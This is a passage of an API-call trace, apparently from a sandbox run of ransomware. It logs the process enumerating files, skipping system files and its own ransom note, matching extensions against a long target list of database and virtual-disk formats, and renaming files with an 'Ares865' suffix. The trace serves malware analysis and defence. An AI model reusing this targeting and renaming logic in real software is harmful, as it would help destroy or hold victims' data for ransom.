dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.077] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.077] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.077] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.078] CloseHandle (hObject=0x154) returned 1 [0065.078] CloseHandle (hObject=0x164) returned 1 [0065.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.078] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="03_Music_rated_at_4_or_5_stars.wpl", cAlternateFileName="03_MUS~1.WPL")) returned 1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="aoldtz.exe") returned -1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2=".") returned 1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="..") returned 1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="windows") returned -1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="bootmgr") returned -1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="temp") returned -1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="pagefile.sys") returned -1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="boot") returned -1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="ids.txt") returned -1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="ntuser.dat") returned -1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="perflogs") returned -1 [0065.078] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="MSBuild") returned -1 [0065.078] lstrlenW (lpString="03_Music_rated_at_4_or_5_stars.wpl") returned 34 [0065.078] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 126 [0065.078] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="03_Music_rated_at_4_or_5_stars.wpl" | out: lpString1="03_Music_rated_at_4_or_5_stars.wpl") returned="03_Music_rated_at_4_or_5_stars.wpl" [0065.078] lstrlenW (lpString="03_Music_rated_at_4_or_5_stars.wpl") returned 34 [0065.078] lstrlenW (lpString="Ares865") returned 7 [0065.078] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0065.079] lstrlenW (lpString=".dll") returned 4 [0065.079] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2=".dll") returned 1 [0065.079] lstrlenW (lpString=".lnk") returned 4 [0065.079] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2=".lnk") returned 1 [0065.079] lstrlenW (lpString=".ini") returned 4 [0065.079] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2=".ini") returned 1 [0065.079] lstrlenW (lpString=".sys") returned 4 [0065.079] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2=".sys") returned 1 [0065.079] lstrlenW (lpString="03_Music_rated_at_4_or_5_stars.wpl") returned 34 [0065.079] lstrcmpiW (lpString1="wpl", lpString2="bak") returned 1 [0065.079] lstrlenW (lpString="ba_") returned 3 [0065.079] lstrcmpiW (lpString1="wpl", lpString2="ba_") returned 1 [0065.079] lstrlenW (lpString="dbb") returned 3 [0065.079] lstrcmpiW (lpString1="wpl", lpString2="dbb") returned 1 [0065.079] lstrlenW (lpString="vmdk") returned 4 [0065.079] lstrcmpiW (lpString1=".wpl", lpString2="vmdk") returned -1 [0065.079] lstrlenW (lpString="rar") returned 3 [0065.079] lstrcmpiW (lpString1="wpl", lpString2="rar") returned 1 [0065.079] lstrlenW (lpString="zip") returned 3 [0065.079] lstrcmpiW (lpString1="wpl", lpString2="zip") returned -1 [0065.079] lstrlenW (lpString="tgz") returned 3 [0065.079] lstrcmpiW (lpString1="wpl", lpString2="tgz") returned 1 [0065.079] lstrlenW (lpString="vbox") returned 4 [0065.079] lstrcmpiW (lpString1=".wpl", lpString2="vbox") returned -1 [0065.079] lstrlenW (lpString="vdi") returned 3 [0065.079] lstrcmpiW (lpString1="wpl", lpString2="vdi") returned 1 [0065.079] lstrlenW (lpString="vhd") returned 3 [0065.079] lstrcmpiW (lpString1="wpl", lpString2="vhd") returned 1 [0065.079] lstrlenW (lpString="vhdx") returned 4 [0065.079] lstrcmpiW (lpString1=".wpl", lpString2="vhdx") returned -1 [0065.079] lstrlenW (lpString="avhd") returned 4 [0065.080] lstrcmpiW (lpString1=".wpl", lpString2="avhd") returned -1 [0065.080] lstrlenW (lpString="db") returned 2 [0065.080] lstrcmpiW (lpString1="pl", lpString2="db") returned 1 [0065.080] lstrlenW (lpString="db2") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="db2") returned 1 [0065.080] lstrlenW (lpString="db3") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="db3") returned 1 [0065.080] lstrlenW (lpString="dbf") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="dbf") returned 1 [0065.080] lstrlenW (lpString="mdf") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="mdf") returned 1 [0065.080] lstrlenW (lpString="mdb") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="mdb") returned 1 [0065.080] lstrlenW (lpString="sql") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="sql") returned 1 [0065.080] lstrlenW (lpString="sqlite") returned 6 [0065.080] lstrcmpiW (lpString1="rs.wpl", lpString2="sqlite") returned -1 [0065.080] lstrlenW (lpString="sqlite3") returned 7 [0065.080] lstrcmpiW (lpString1="ars.wpl", lpString2="sqlite3") returned -1 [0065.080] lstrlenW (lpString="sqlitedb") returned 8 [0065.080] lstrcmpiW (lpString1="tars.wpl", lpString2="sqlitedb") returned 1 [0065.080] lstrlenW (lpString="xml") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="xml") returned -1 [0065.080] lstrlenW (lpString="$er") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="$er") returned 1 [0065.080] lstrlenW (lpString="4dd") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="4dd") returned 1 [0065.080] lstrlenW (lpString="4dl") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="4dl") returned 1 [0065.080] lstrlenW (lpString="^^^") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="^^^") returned 1 [0065.080] lstrlenW (lpString="abs") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="abs") returned 1 [0065.080] lstrlenW (lpString="abx") returned 3 [0065.080] lstrcmpiW (lpString1="wpl", lpString2="abx") returned 1 [0065.080] lstrlenW (lpString="accdb") returned 5 [0065.080] lstrcmpiW (lpString1="s.wpl", lpString2="accdb") returned 1 [0065.080] lstrlenW (lpString="accdc") returned 5 [0065.081] lstrcmpiW (lpString1="s.wpl", lpString2="accdc") returned 1 [0065.081] lstrlenW (lpString="accde") returned 5 [0065.081] lstrcmpiW (lpString1="s.wpl", lpString2="accde") returned 1 [0065.081] lstrlenW (lpString="accdr") returned 5 [0065.081] lstrcmpiW (lpString1="s.wpl", lpString2="accdr") returned 1 [0065.081] lstrlenW (lpString="accdt") returned 5 [0065.081] lstrcmpiW (lpString1="s.wpl", lpString2="accdt") returned 1 [0065.081] lstrlenW (lpString="accdw") returned 5 [0065.081] lstrcmpiW (lpString1="s.wpl", lpString2="accdw") returned 1 [0065.081] lstrlenW (lpString="accft") returned 5 [0065.081] lstrcmpiW (lpString1="s.wpl", lpString2="accft") returned 1 [0065.081] lstrlenW (lpString="adb") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.081] lstrlenW (lpString="adb") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.081] lstrlenW (lpString="ade") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="ade") returned 1 [0065.081] lstrlenW (lpString="adf") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="adf") returned 1 [0065.081] lstrlenW (lpString="adn") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="adn") returned 1 [0065.081] lstrlenW (lpString="adp") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="adp") returned 1 [0065.081] lstrlenW (lpString="alf") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="alf") returned 1 [0065.081] lstrlenW (lpString="ask") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="ask") returned 1 [0065.081] lstrlenW (lpString="btr") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="btr") returned 1 [0065.081] lstrlenW (lpString="cat") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="cat") returned 1 [0065.081] lstrlenW (lpString="cdb") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="cdb") returned 1 [0065.081] lstrlenW (lpString="ckp") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="ckp") returned 1 [0065.081] lstrlenW (lpString="cma") returned 3 [0065.081] lstrcmpiW (lpString1="wpl", lpString2="cma") returned 1 [0065.081] lstrlenW (lpString="cpd") returned 3 [0065.082] lstrcmpiW (lpString1="wpl", lpString2="cpd") returned 1 [0065.082] lstrlenW (lpString="dacpac") returned 6 [0065.082] lstrcmpiW (lpString1="rs.wpl", lpString2="dacpac") returned 1 [0065.082] lstrlenW (lpString="dad") returned 3 [0065.082] lstrcmpiW (lpString1="wpl", lpString2="dad") returned 1 [0065.082] lstrlenW (lpString="dadiagrams") returned 10 [0065.082] lstrcmpiW (lpString1="_stars.wpl", lpString2="dadiagrams") returned -1 [0065.082] lstrlenW (lpString="daschema") returned 8 [0065.082] lstrcmpiW (lpString1="tars.wpl", lpString2="daschema") returned 1 [0065.082] lstrlenW (lpString="db-journal") returned 10 [0065.082] lstrcmpiW (lpString1="_stars.wpl", lpString2="db-journal") returned -1 [0065.082] lstrlenW (lpString="db-shm") returned 6 [0065.082] lstrcmpiW (lpString1="rs.wpl", lpString2="db-shm") returned 1 [0065.082] lstrlenW (lpString="db-wal") returned 6 [0065.082] lstrcmpiW (lpString1="rs.wpl", lpString2="db-wal") returned 1 [0065.082] lstrlenW (lpString="dbc") returned 3 [0065.082] lstrcmpiW (lpString1="wpl", lpString2="dbc") returned 1 [0065.082] lstrlenW (lpString="dbs") returned 3 [0065.082] lstrcmpiW (lpString1="wpl", lpString2="dbs") returned 1 [0065.082] lstrlenW (lpString="dbt") returned 3 [0065.082] lstrcmpiW (lpString1="wpl", lpString2="dbt") returned 1 [0065.082] lstrlenW (lpString="dbv") returned 3 [0065.082] lstrcmpiW (lpString1="wpl", lpString2="dbv") returned 1 [0065.082] lstrlenW (lpString="dbx") returned 3 [0065.082] lstrcmpiW (lpString1="wpl", lpString2="dbx") returned 1 [0065.082] lstrlenW (lpString="dcb") returned 3 [0065.082] lstrcmpiW (lpString1="wpl", lpString2="dcb") returned 1 [0065.082] lstrlenW (lpString="dct") returned 3 [0065.082] lstrcmpiW (lpString1="wpl", lpString2="dct") returned 1 [0065.082] lstrlenW (lpString="dcx") returned 3 [0065.082] lstrcmpiW (lpString1="wpl", lpString2="dcx") returned 1 [0065.082] lstrlenW (lpString="ddl") returned 3 [0065.082] lstrcmpiW (lpString1="wpl", lpString2="ddl") returned 1 [0065.082] lstrlenW (lpString="dlis") returned 4 [0065.082] lstrcmpiW (lpString1=".wpl", lpString2="dlis") returned -1 [0065.082] lstrlenW (lpString="dp1") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="dp1") returned 1 [0065.083] lstrlenW (lpString="dqy") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="dqy") returned 1 [0065.083] lstrlenW (lpString="dsk") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="dsk") returned 1 [0065.083] lstrlenW (lpString="dsn") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="dsn") returned 1 [0065.083] lstrlenW (lpString="dtsx") returned 4 [0065.083] lstrcmpiW (lpString1=".wpl", lpString2="dtsx") returned -1 [0065.083] lstrlenW (lpString="dxl") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="dxl") returned 1 [0065.083] lstrlenW (lpString="eco") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="eco") returned 1 [0065.083] lstrlenW (lpString="ecx") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="ecx") returned 1 [0065.083] lstrlenW (lpString="edb") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="edb") returned 1 [0065.083] lstrlenW (lpString="epim") returned 4 [0065.083] lstrcmpiW (lpString1=".wpl", lpString2="epim") returned -1 [0065.083] lstrlenW (lpString="fcd") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="fcd") returned 1 [0065.083] lstrlenW (lpString="fdb") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="fdb") returned 1 [0065.083] lstrlenW (lpString="fic") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="fic") returned 1 [0065.083] lstrlenW (lpString="flexolibrary") returned 12 [0065.083] lstrcmpiW (lpString1="_5_stars.wpl", lpString2="flexolibrary") returned -1 [0065.083] lstrlenW (lpString="fm5") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="fm5") returned 1 [0065.083] lstrlenW (lpString="fmp") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="fmp") returned 1 [0065.083] lstrlenW (lpString="fmp12") returned 5 [0065.083] lstrcmpiW (lpString1="s.wpl", lpString2="fmp12") returned 1 [0065.083] lstrlenW (lpString="fmpsl") returned 5 [0065.083] lstrcmpiW (lpString1="s.wpl", lpString2="fmpsl") returned 1 [0065.083] lstrlenW (lpString="fol") returned 3 [0065.083] lstrcmpiW (lpString1="wpl", lpString2="fol") returned 1 [0065.084] lstrlenW (lpString="fp3") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="fp3") returned 1 [0065.084] lstrlenW (lpString="fp4") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="fp4") returned 1 [0065.084] lstrlenW (lpString="fp5") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="fp5") returned 1 [0065.084] lstrlenW (lpString="fp7") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="fp7") returned 1 [0065.084] lstrlenW (lpString="fpt") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="fpt") returned 1 [0065.084] lstrlenW (lpString="frm") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="frm") returned 1 [0065.084] lstrlenW (lpString="gdb") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="gdb") returned 1 [0065.084] lstrlenW (lpString="gdb") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="gdb") returned 1 [0065.084] lstrlenW (lpString="grdb") returned 4 [0065.084] lstrcmpiW (lpString1=".wpl", lpString2="grdb") returned -1 [0065.084] lstrlenW (lpString="gwi") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="gwi") returned 1 [0065.084] lstrlenW (lpString="hdb") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="hdb") returned 1 [0065.084] lstrlenW (lpString="his") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="his") returned 1 [0065.084] lstrlenW (lpString="ib") returned 2 [0065.084] lstrcmpiW (lpString1="pl", lpString2="ib") returned 1 [0065.084] lstrlenW (lpString="idb") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="idb") returned 1 [0065.084] lstrlenW (lpString="ihx") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="ihx") returned 1 [0065.084] lstrlenW (lpString="itdb") returned 4 [0065.084] lstrcmpiW (lpString1=".wpl", lpString2="itdb") returned -1 [0065.084] lstrlenW (lpString="itw") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="itw") returned 1 [0065.084] lstrlenW (lpString="jet") returned 3 [0065.084] lstrcmpiW (lpString1="wpl", lpString2="jet") returned 1 [0065.084] lstrlenW (lpString="jtx") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="jtx") returned 1 [0065.085] lstrlenW (lpString="kdb") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="kdb") returned 1 [0065.085] lstrlenW (lpString="kexi") returned 4 [0065.085] lstrcmpiW (lpString1=".wpl", lpString2="kexi") returned -1 [0065.085] lstrlenW (lpString="kexic") returned 5 [0065.085] lstrcmpiW (lpString1="s.wpl", lpString2="kexic") returned 1 [0065.085] lstrlenW (lpString="kexis") returned 5 [0065.085] lstrcmpiW (lpString1="s.wpl", lpString2="kexis") returned 1 [0065.085] lstrlenW (lpString="lgc") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="lgc") returned 1 [0065.085] lstrlenW (lpString="lwx") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="lwx") returned 1 [0065.085] lstrlenW (lpString="maf") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="maf") returned 1 [0065.085] lstrlenW (lpString="maq") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="maq") returned 1 [0065.085] lstrlenW (lpString="mar") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="mar") returned 1 [0065.085] lstrlenW (lpString="marshal") returned 7 [0065.085] lstrcmpiW (lpString1="ars.wpl", lpString2="marshal") returned -1 [0065.085] lstrlenW (lpString="mas") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="mas") returned 1 [0065.085] lstrlenW (lpString="mav") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="mav") returned 1 [0065.085] lstrlenW (lpString="maw") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="maw") returned 1 [0065.085] lstrlenW (lpString="mdbhtml") returned 7 [0065.085] lstrcmpiW (lpString1="ars.wpl", lpString2="mdbhtml") returned -1 [0065.085] lstrlenW (lpString="mdn") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="mdn") returned 1 [0065.085] lstrlenW (lpString="mdt") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="mdt") returned 1 [0065.085] lstrlenW (lpString="mfd") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="mfd") returned 1 [0065.085] lstrlenW (lpString="mpd") returned 3 [0065.085] lstrcmpiW (lpString1="wpl", lpString2="mpd") returned 1 [0065.085] lstrlenW (lpString="mrg") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="mrg") returned 1 [0065.086] lstrlenW (lpString="mud") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="mud") returned 1 [0065.086] lstrlenW (lpString="mwb") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="mwb") returned 1 [0065.086] lstrlenW (lpString="myd") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="myd") returned 1 [0065.086] lstrlenW (lpString="ndf") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="ndf") returned 1 [0065.086] lstrlenW (lpString="nnt") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="nnt") returned 1 [0065.086] lstrlenW (lpString="nrmlib") returned 6 [0065.086] lstrcmpiW (lpString1="rs.wpl", lpString2="nrmlib") returned 1 [0065.086] lstrlenW (lpString="ns2") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="ns2") returned 1 [0065.086] lstrlenW (lpString="ns3") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="ns3") returned 1 [0065.086] lstrlenW (lpString="ns4") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="ns4") returned 1 [0065.086] lstrlenW (lpString="nsf") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="nsf") returned 1 [0065.086] lstrlenW (lpString="nv") returned 2 [0065.086] lstrcmpiW (lpString1="pl", lpString2="nv") returned 1 [0065.086] lstrlenW (lpString="nv2") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="nv2") returned 1 [0065.086] lstrlenW (lpString="nwdb") returned 4 [0065.086] lstrcmpiW (lpString1=".wpl", lpString2="nwdb") returned -1 [0065.086] lstrlenW (lpString="nyf") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="nyf") returned 1 [0065.086] lstrlenW (lpString="odb") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="odb") returned 1 [0065.086] lstrlenW (lpString="odb") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="odb") returned 1 [0065.086] lstrlenW (lpString="oqy") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="oqy") returned 1 [0065.086] lstrlenW (lpString="ora") returned 3 [0065.086] lstrcmpiW (lpString1="wpl", lpString2="ora") returned 1 [0065.087] lstrlenW (lpString="orx") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="orx") returned 1 [0065.087] lstrlenW (lpString="owc") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="owc") returned 1 [0065.087] lstrlenW (lpString="p96") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="p96") returned 1 [0065.087] lstrlenW (lpString="p97") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="p97") returned 1 [0065.087] lstrlenW (lpString="pan") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="pan") returned 1 [0065.087] lstrlenW (lpString="pdb") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="pdb") returned 1 [0065.087] lstrlenW (lpString="pdm") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="pdm") returned 1 [0065.087] lstrlenW (lpString="pnz") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="pnz") returned 1 [0065.087] lstrlenW (lpString="qry") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="qry") returned 1 [0065.087] lstrlenW (lpString="qvd") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="qvd") returned 1 [0065.087] lstrlenW (lpString="rbf") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="rbf") returned 1 [0065.087] lstrlenW (lpString="rctd") returned 4 [0065.087] lstrcmpiW (lpString1=".wpl", lpString2="rctd") returned -1 [0065.087] lstrlenW (lpString="rod") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="rod") returned 1 [0065.087] lstrlenW (lpString="rodx") returned 4 [0065.087] lstrcmpiW (lpString1=".wpl", lpString2="rodx") returned -1 [0065.087] lstrlenW (lpString="rpd") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="rpd") returned 1 [0065.087] lstrlenW (lpString="rsd") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="rsd") returned 1 [0065.087] lstrlenW (lpString="sas7bdat") returned 8 [0065.087] lstrcmpiW (lpString1="tars.wpl", lpString2="sas7bdat") returned 1 [0065.087] lstrlenW (lpString="sbf") returned 3 [0065.087] lstrcmpiW (lpString1="wpl", lpString2="sbf") returned 1 [0065.087] lstrlenW (lpString="scx") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="scx") returned 1 [0065.088] lstrlenW (lpString="sdb") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="sdb") returned 1 [0065.088] lstrlenW (lpString="sdc") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="sdc") returned 1 [0065.088] lstrlenW (lpString="sdf") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="sdf") returned 1 [0065.088] lstrlenW (lpString="sis") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="sis") returned 1 [0065.088] lstrlenW (lpString="spq") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="spq") returned 1 [0065.088] lstrlenW (lpString="te") returned 2 [0065.088] lstrcmpiW (lpString1="pl", lpString2="te") returned -1 [0065.088] lstrlenW (lpString="teacher") returned 7 [0065.088] lstrcmpiW (lpString1="ars.wpl", lpString2="teacher") returned -1 [0065.088] lstrlenW (lpString="tmd") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="tmd") returned 1 [0065.088] lstrlenW (lpString="tps") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="tps") returned 1 [0065.088] lstrlenW (lpString="trc") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="trc") returned 1 [0065.088] lstrlenW (lpString="trc") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="trc") returned 1 [0065.088] lstrlenW (lpString="trm") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="trm") returned 1 [0065.088] lstrlenW (lpString="udb") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="udb") returned 1 [0065.088] lstrlenW (lpString="udl") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="udl") returned 1 [0065.088] lstrlenW (lpString="usr") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="usr") returned 1 [0065.088] lstrlenW (lpString="v12") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="v12") returned 1 [0065.088] lstrlenW (lpString="vis") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="vis") returned 1 [0065.088] lstrlenW (lpString="vpd") returned 3 [0065.088] lstrcmpiW (lpString1="wpl", lpString2="vpd") returned 1 [0065.088] lstrlenW (lpString="vvv") returned 3 [0065.089] lstrcmpiW (lpString1="wpl", lpString2="vvv") returned 1 [0065.089] lstrlenW (lpString="wdb") returned 3 [0065.089] lstrcmpiW (lpString1="wpl", lpString2="wdb") returned 1 [0065.089] lstrlenW (lpString="wmdb") returned 4 [0065.089] lstrcmpiW (lpString1=".wpl", lpString2="wmdb") returned -1 [0065.089] lstrlenW (lpString="wrk") returned 3 [0065.089] lstrcmpiW (lpString1="wpl", lpString2="wrk") returned -1 [0065.089] lstrlenW (lpString="xdb") returned 3 [0065.089] lstrcmpiW (lpString1="wpl", lpString2="xdb") returned -1 [0065.089] lstrlenW (lpString="xld") returned 3 [0065.089] lstrcmpiW (lpString1="wpl", lpString2="xld") returned -1 [0065.089] lstrlenW (lpString="xmlff") returned 5 [0065.089] lstrcmpiW (lpString1="s.wpl", lpString2="xmlff") returned -1 [0065.089] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.Ares865") returned 132 [0065.089] MoveFileExW (lpExistingFileName="C:\\Users\\Default 